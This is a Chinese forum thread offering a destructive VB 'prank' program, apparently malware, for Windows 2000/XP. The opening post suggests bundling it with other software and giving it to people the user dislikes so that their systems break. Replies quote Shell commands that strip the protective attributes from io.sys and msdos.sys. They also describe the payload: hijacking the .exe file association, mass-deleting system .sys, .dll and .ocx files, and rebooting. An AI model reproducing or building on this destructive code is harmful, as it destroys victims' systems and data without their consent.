年少无知 修改版本

hjitss

——————————————————————————年少无知 修改版本——————————————————————————————————————————————
年少无知 修改版本，破坏增强。适合WIN2000/XP系统
本程序是无聊之做，只供人心情不好时，送给得罪你的人运行之用。
本程序体积小，可以和其他程序捆绑，送给得罪你的人运行。如果对方不熟悉注册表，就得重装系统。本恶做剧程序破坏里极大，请谨慎用之。附带源代码。
没有程序，vb代码。
—————————————————————————————————————————————————————————————————————————————————

Mr.Tong

pass kis

小白鼠

小白表示代码看的不是很懂。还是说下原理吧~

        Shell "command.com /c attrib -h -r -s c:\io.sys"
        Shell "command.com /c attrib -h -r -s c:\msdos.sys"

貌似不光修改注册表吧~还有修改引导文件属性吧~

blue_仰望

Mr.Tong 发表于 2011-7-31 20:04
pass kis

这是源码，卡巴如果杀就有问题了。

blue_仰望

建议楼主还是打包exe吧，我这没有vb，只有C++ buileder额……

schumi小粉

卡巴已经能查杀了。。。。163的邮件附件没加密，直接上报avast，一秒后，系统退件。。。。称含有病毒


可见卡巴引擎已经入库了。。。。

hx1997

LZ这不是VB源码么...
等会我编译下...

LZ发附件也要发全啊，这样怎么编译...



似乎是
在注册表项HKEY_CLASSES_ROOT\MyApp下将(默认)设为My Application(REG_SZ类型)
在注册表项HKEY_CLASSES_ROOT\.exe下将(默认)设为MyApp(REG_SZ类型)
在注册表项HKEY_CLASSES_ROOT\MyApp下将shell\open\command设为 %1(REG_SZ类型)

静默去除C:\io.sys和C:\msdos.sys的隐藏、只读、系统属性

似乎根据命令行的不同会有不同动作，懒得看了

静默删除以下项目
C:\*.sys
C:\winnt\system32\win.com
C\winnt\system32\win.ini
C:\windows\win.ini
C:\windows\win.com
C:\winnt\system32\*.dll
C:\windows\system\*.dll
C:\winnt\system32\*.clp
C:\winnt\system32\*.ocx

重启系统

建议：Shell那几句Shell "cmd /c ......就行了，command.com那是98时代的东西

hx1997

OA这一步要是不点阻止就悲剧了

XMonster

hx1997 发表于 2011-7-31 23:45
OA这一步要是不点阻止就悲剧了

偶看到瑞星了 其实乃可以把 系统加固设置阻止，不用询问

hx1997

dm34343667 发表于 2011-8-1 13:39
偶看到瑞星了 其实乃可以把 系统加固设置阻止，不用询问

OK
Thx for your suggestion.